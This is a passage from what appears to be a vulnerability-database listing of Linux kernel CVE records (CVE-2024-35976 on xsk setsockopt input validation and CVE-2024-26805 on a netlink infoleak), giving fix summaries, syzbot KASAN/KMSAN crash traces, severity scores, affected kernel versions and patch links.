"url": "https://git.kernel.org/stable/c/7d9e5bed036a7f9e2062a137e97e3c1e77fb8759"
},
{
"url": "https://git.kernel.org/stable/c/71c6670f9f032ec67d8f4e3f8db4646bf5a62883"
},
{
"url": "https://git.kernel.org/stable/c/744e1885922a9943458954cfea917b31064b4131"
}
],
"title": "crypto: scomp - fix req-\u003edst buffer overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52612",
"datePublished": "2024-03-18T10:07:47.204Z",
"dateReserved": "2024-03-06T09:52:12.088Z",
"dateUpdated": "2025-05-04T07:39:52.034Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35976 (GCVE-0-2024-35976)
Vulnerability from cvelistv5
Published
2024-05-20 09:42
Modified
2025-11-04 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xsk: validate user input for XDP_{UMEM|COMPLETION}_FILL_RING
syzbot reported an illegal copy in xsk_setsockopt() [1]
Make sure to validate setsockopt() @optlen parameter.
[1]
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr include/linux/sockptr.h:55 [inline]
BUG: KASAN: slab-out-of-bounds in xsk_setsockopt+0x909/0xa40 net/xdp/xsk.c:1420
Read of size 4 at addr ffff888028c6cde3 by task syz-executor.0/7549
CPU: 0 PID: 7549 Comm: syz-executor.0 Not tainted 6.8.0-syzkaller-08951-gfe46a7dd189e #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114
print_address_description mm/kasan/report.c:377 [inline]
print_report+0x169/0x550 mm/kasan/report.c:488
kasan_report+0x143/0x180 mm/kasan/report.c:601
copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]
copy_from_sockptr include/linux/sockptr.h:55 [inline]
xsk_setsockopt+0x909/0xa40 net/xdp/xsk.c:1420
do_sock_setsockopt+0x3af/0x720 net/socket.c:2311
__sys_setsockopt+0x1ae/0x250 net/socket.c:2334
__do_sys_setsockopt net/socket.c:2343 [inline]
__se_sys_setsockopt net/socket.c:2340 [inline]
__x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340
do_syscall_64+0xfb/0x240
entry_SYSCALL_64_after_hwframe+0x6d/0x75
RIP: 0033:0x7fb40587de69
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fb40665a0c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000036
RAX: ffffffffffffffda RBX: 00007fb4059abf80 RCX: 00007fb40587de69
RDX: 0000000000000005 RSI: 000000000000011b RDI: 0000000000000006
RBP: 00007fb4058ca47a R08: 0000000000000002 R09: 0000000000000000
R10: 0000000020001980 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007fb4059abf80 R15: 00007fff57ee4d08
</TASK>
Allocated by task 7549:
kasan_save_stack mm/kasan/common.c:47 [inline]
kasan_save_track+0x3f/0x80 mm/kasan/common.c:68
poison_kmalloc_redzone mm/kasan/common.c:370 [inline]
__kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:387
kasan_kmalloc include/linux/kasan.h:211 [inline]
__do_kmalloc_node mm/slub.c:3966 [inline]
__kmalloc+0x233/0x4a0 mm/slub.c:3979
kmalloc include/linux/slab.h:632 [inline]
__cgroup_bpf_run_filter_setsockopt+0xd2f/0x1040 kernel/bpf/cgroup.c:1869
do_sock_setsockopt+0x6b4/0x720 net/socket.c:2293
__sys_setsockopt+0x1ae/0x250 net/socket.c:2334
__do_sys_setsockopt net/socket.c:2343 [inline]
__se_sys_setsockopt net/socket.c:2340 [inline]
__x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340
do_syscall_64+0xfb/0x240
entry_SYSCALL_64_after_hwframe+0x6d/0x75
The buggy address belongs to the object at ffff888028c6cde0
which belongs to the cache kmalloc-8 of size 8
The buggy address is located 1 bytes to the right of
allocated 2-byte region [ffff888028c6cde0, ffff888028c6cde2)
The buggy address belongs to the physical page:
page:ffffea0000a31b00 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888028c6c9c0 pfn:0x28c6c
anon flags: 0xfff00000000800(slab|node=0|zone=1|lastcpupid=0x7ff)
page_type: 0xffffffff()
raw: 00fff00000000800 ffff888014c41280 0000000000000000 dead000000000001
raw: ffff888028c6c9c0 0000000080800057 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
page_owner tracks the page as allocated
page last allocated via order 0, migratetype Unmovable, gfp_mask 0x112cc0(GFP_USER|__GFP_NOWARN|__GFP_NORETRY), pid 6648, tgid 6644 (syz-executor.0), ts 133906047828, free_ts 133859922223
set_page_owner include/linux/page_owner.h:31 [inline]
post_alloc_hook+0x1ea/0x210 mm/page_alloc.c:1533
prep_new_page mm/page_alloc.c:
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 Version: 423f38329d267969130fb6f2c685f73d72687558 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.18:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.18"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35976",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:37:56.972231Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787 Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:07.661Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:53.592Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/beb99266830520e15fbc6ca8cc5a5240d76851fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b45c25d60e38f5c2cb6823f886773a34323306d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a82984b3c6a7e8c7937dba6e857ddf829d149417"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0a068de65d5b7358e9aff792716afa9333f3922"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a523f14a3f53b46ff0e1fafd215b0bc5f6783aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b143e19dc28c3211f050f7848d87d9b0a170e10c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2eb979fbb2479bcd7e049f2f9978b6590dd8a0e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/237f3cf13b20db183d3706d997eedc3c49eacd44"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/xdp/xsk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "beb99266830520e15fbc6ca8cc5a5240d76851fd",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "0b45c25d60e38f5c2cb6823f886773a34323306d",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "a82984b3c6a7e8c7937dba6e857ddf829d149417",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "f0a068de65d5b7358e9aff792716afa9333f3922",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "2a523f14a3f53b46ff0e1fafd215b0bc5f6783aa",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "b143e19dc28c3211f050f7848d87d9b0a170e10c",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "2eb979fbb2479bcd7e049f2f9978b6590dd8a0e6",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
},
{
"lessThan": "237f3cf13b20db183d3706d997eedc3c49eacd44",
"status": "affected",
"version": "423f38329d267969130fb6f2c685f73d72687558",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/xdp/xsk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxsk: validate user input for XDP_{UMEM|COMPLETION}_FILL_RING\n\nsyzbot reported an illegal copy in xsk_setsockopt() [1]\n\nMake sure to validate setsockopt() @optlen parameter.\n\n[1]\n\n BUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]\n BUG: KASAN: slab-out-of-bounds in copy_from_sockptr include/linux/sockptr.h:55 [inline]\n BUG: KASAN: slab-out-of-bounds in xsk_setsockopt+0x909/0xa40 net/xdp/xsk.c:1420\nRead of size 4 at addr ffff888028c6cde3 by task syz-executor.0/7549\n\nCPU: 0 PID: 7549 Comm: syz-executor.0 Not tainted 6.8.0-syzkaller-08951-gfe46a7dd189e #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x169/0x550 mm/kasan/report.c:488\n kasan_report+0x143/0x180 mm/kasan/report.c:601\n copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]\n copy_from_sockptr include/linux/sockptr.h:55 [inline]\n xsk_setsockopt+0x909/0xa40 net/xdp/xsk.c:1420\n do_sock_setsockopt+0x3af/0x720 net/socket.c:2311\n __sys_setsockopt+0x1ae/0x250 net/socket.c:2334\n __do_sys_setsockopt net/socket.c:2343 [inline]\n __se_sys_setsockopt net/socket.c:2340 [inline]\n __x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\nRIP: 0033:0x7fb40587de69\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fb40665a0c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000036\nRAX: ffffffffffffffda RBX: 00007fb4059abf80 RCX: 00007fb40587de69\nRDX: 0000000000000005 RSI: 000000000000011b RDI: 0000000000000006\nRBP: 00007fb4058ca47a R08: 0000000000000002 R09: 0000000000000000\nR10: 0000000020001980 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007fb4059abf80 R15: 00007fff57ee4d08\n \u003c/TASK\u003e\n\nAllocated by task 7549:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3f/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:370 [inline]\n __kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:387\n kasan_kmalloc include/linux/kasan.h:211 [inline]\n __do_kmalloc_node mm/slub.c:3966 [inline]\n __kmalloc+0x233/0x4a0 mm/slub.c:3979\n kmalloc include/linux/slab.h:632 [inline]\n __cgroup_bpf_run_filter_setsockopt+0xd2f/0x1040 kernel/bpf/cgroup.c:1869\n do_sock_setsockopt+0x6b4/0x720 net/socket.c:2293\n __sys_setsockopt+0x1ae/0x250 net/socket.c:2334\n __do_sys_setsockopt net/socket.c:2343 [inline]\n __se_sys_setsockopt net/socket.c:2340 [inline]\n __x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nThe buggy address belongs to the object at ffff888028c6cde0\n which belongs to the cache kmalloc-8 of size 8\nThe buggy address is located 1 bytes to the right of\n allocated 2-byte region [ffff888028c6cde0, ffff888028c6cde2)\n\nThe buggy address belongs to the physical page:\npage:ffffea0000a31b00 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888028c6c9c0 pfn:0x28c6c\nanon flags: 0xfff00000000800(slab|node=0|zone=1|lastcpupid=0x7ff)\npage_type: 0xffffffff()\nraw: 00fff00000000800 ffff888014c41280 0000000000000000 dead000000000001\nraw: ffff888028c6c9c0 0000000080800057 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\npage_owner tracks the page as allocated\npage last allocated via order 0, migratetype Unmovable, gfp_mask 0x112cc0(GFP_USER|__GFP_NOWARN|__GFP_NORETRY), pid 6648, tgid 6644 (syz-executor.0), ts 133906047828, free_ts 133859922223\n set_page_owner include/linux/page_owner.h:31 [inline]\n post_alloc_hook+0x1ea/0x210 mm/page_alloc.c:1533\n prep_new_page mm/page_alloc.c:\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:36.804Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/beb99266830520e15fbc6ca8cc5a5240d76851fd"
},
{
"url": "https://git.kernel.org/stable/c/0b45c25d60e38f5c2cb6823f886773a34323306d"
},
{
"url": "https://git.kernel.org/stable/c/a82984b3c6a7e8c7937dba6e857ddf829d149417"
},
{
"url": "https://git.kernel.org/stable/c/f0a068de65d5b7358e9aff792716afa9333f3922"
},
{
"url": "https://git.kernel.org/stable/c/2a523f14a3f53b46ff0e1fafd215b0bc5f6783aa"
},
{
"url": "https://git.kernel.org/stable/c/b143e19dc28c3211f050f7848d87d9b0a170e10c"
},
{
"url": "https://git.kernel.org/stable/c/2eb979fbb2479bcd7e049f2f9978b6590dd8a0e6"
},
{
"url": "https://git.kernel.org/stable/c/237f3cf13b20db183d3706d997eedc3c49eacd44"
}
],
"title": "xsk: validate user input for XDP_{UMEM|COMPLETION}_FILL_RING",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35976",
"datePublished": "2024-05-20T09:42:02.415Z",
"dateReserved": "2024-05-17T13:50:33.143Z",
"dateUpdated": "2025-11-04T17:20:53.592Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26805 (GCVE-0-2024-26805)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netlink: Fix kernel-infoleak-after-free in __skb_datagram_iter
syzbot reported the following uninit-value access issue [1]:
netlink_to_full_skb() creates a new `skb` and puts the `skb->data`
passed as a 1st arg of netlink_to_full_skb() onto new `skb`. The data
size is specified as `len` and passed to skb_put_data(). This `len`
is based on `skb->end` that is not data offset but buffer offset. The
`skb->end` contains data and tailroom. Since the tailroom is not
initialized when the new `skb` created, KMSAN detects uninitialized
memory area when copying the data.
This patch resolved this issue by correct the len from `skb->end` to
`skb->len`, which is the actual data offset.
BUG: KMSAN: kernel-infoleak-after-free in instrument_copy_to_user include/linux/instrumented.h:114 [inline]
BUG: KMSAN: kernel-infoleak-after-free in copy_to_user_iter lib/iov_iter.c:24 [inline]
BUG: KMSAN: kernel-infoleak-after-free in iterate_ubuf include/linux/iov_iter.h:29 [inline]
BUG: KMSAN: kernel-infoleak-after-free in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
BUG: KMSAN: kernel-infoleak-after-free in iterate_and_advance include/linux/iov_iter.h:271 [inline]
BUG: KMSAN: kernel-infoleak-after-free in _copy_to_iter+0x364/0x2520 lib/iov_iter.c:186
instrument_copy_to_user include/linux/instrumented.h:114 [inline]
copy_to_user_iter lib/iov_iter.c:24 [inline]
iterate_ubuf include/linux/iov_iter.h:29 [inline]
iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
iterate_and_advance include/linux/iov_iter.h:271 [inline]
_copy_to_iter+0x364/0x2520 lib/iov_iter.c:186
copy_to_iter include/linux/uio.h:197 [inline]
simple_copy_to_iter+0x68/0xa0 net/core/datagram.c:532
__skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:420
skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546
skb_copy_datagram_msg include/linux/skbuff.h:3960 [inline]
packet_recvmsg+0xd9c/0x2000 net/packet/af_packet.c:3482
sock_recvmsg_nosec net/socket.c:1044 [inline]
sock_recvmsg net/socket.c:1066 [inline]
sock_read_iter+0x467/0x580 net/socket.c:1136
call_read_iter include/linux/fs.h:2014 [inline]
new_sync_read fs/read_write.c:389 [inline]
vfs_read+0x8f6/0xe00 fs/read_write.c:470
ksys_read+0x20f/0x4c0 fs/read_write.c:613
__do_sys_read fs/read_write.c:623 [inline]
__se_sys_read fs/read_write.c:621 [inline]
__x64_sys_read+0x93/0xd0 fs/read_write.c:621
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was stored to memory at:
skb_put_data include/linux/skbuff.h:2622 [inline]
netlink_to_full_skb net/netlink/af_netlink.c:181 [inline]
__netlink_deliver_tap_skb net/netlink/af_netlink.c:298 [inline]
__netlink_deliver_tap+0x5be/0xc90 net/netlink/af_netlink.c:325
netlink_deliver_tap net/netlink/af_netlink.c:338 [inline]
netlink_deliver_tap_kernel net/netlink/af_netlink.c:347 [inline]
netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]
netlink_unicast+0x10f1/0x1250 net/netlink/af_netlink.c:1368
netlink_sendmsg+0x1238/0x13d0 net/netlink/af_netlink.c:1910
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendmsg net/socket.c:2676 [inline]
__se_sys_sendmsg net/socket.c:2674 [inline]
__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
free_pages_prepare mm/page_alloc.c:1087 [inline]
free_unref_page_prepare+0xb0/0xa40 mm/page_alloc.c:2347
free_unref_page_list+0xeb/0x1100 mm/page_alloc.c:2533
release_pages+0x23d3/0x2410 mm/swap.c:1042
free_pages_and_swap_cache+0xd9/0xf0 mm/swap_state.c:316
tlb_batch_pages
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 1853c949646005b5959c483becde86608f548f24 Version: 92994a5f49d0a81c8643452d5c0a6e8b31d85a61 Version: 85aec6328f3346b0718211faad564a3ffa64f60e Version: d38200098e3203ba30ba06ed3f345ec6ca75234c Version: 65d48c630ff80a19c39751a4a6d3315f4c3c0280 Version: 62f43b58d2b2c4f0200b9ca2b997f4c484f0272f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26805",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:06:14.957747Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:06:26.202Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.525Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec343a55b687a452f5e87f3b52bf9f155864df65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ae51361da43270f4ba0eb924427a07e87e48777"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f19d1f98e60e68b11fc60839105dd02a30ec0d77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c71ed29d15b1a1ed6c464f8c3536996963046285"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b27bf4c494d61e5663baa34c3edd7ccebf0ea44"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3ada42e534a83b618bbc1e490d23bf0fdae4736"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59fc3e3d049e39e7d0d271f20dd5fb47c57faf1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/661779e1fcafe1b74b3f3fe8e980c1e207fea1fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netlink/af_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ec343a55b687a452f5e87f3b52bf9f155864df65",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "9ae51361da43270f4ba0eb924427a07e87e48777",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "f19d1f98e60e68b11fc60839105dd02a30ec0d77",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "c71ed29d15b1a1ed6c464f8c3536996963046285",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "0b27bf4c494d61e5663baa34c3edd7ccebf0ea44",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "d3ada42e534a83b618bbc1e490d23bf0fdae4736",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "59fc3e3d049e39e7d0d271f20dd5fb47c57faf1d",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"lessThan": "661779e1fcafe1b74b3f3fe8e980c1e207fea1fd",
"status": "affected",
"version": "1853c949646005b5959c483becde86608f548f24",
"versionType": "git"
},
{
"status": "affected",
"version": "92994a5f49d0a81c8643452d5c0a6e8b31d85a61",
"versionType": "git"
},
{
"status": "affected",
"version": "85aec6328f3346b0718211faad564a3ffa64f60e",
"versionType": "git"
},
{
"status": "affected",
"version": "d38200098e3203ba30ba06ed3f345ec6ca75234c",
"versionType": "git"
},
{
"status": "affected",
"version": "65d48c630ff80a19c39751a4a6d3315f4c3c0280",
"versionType": "git"
},
{
"status": "affected",
"version": "62f43b58d2b2c4f0200b9ca2b997f4c484f0272f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netlink/af_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.3"
},
{
"lessThan": "4.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
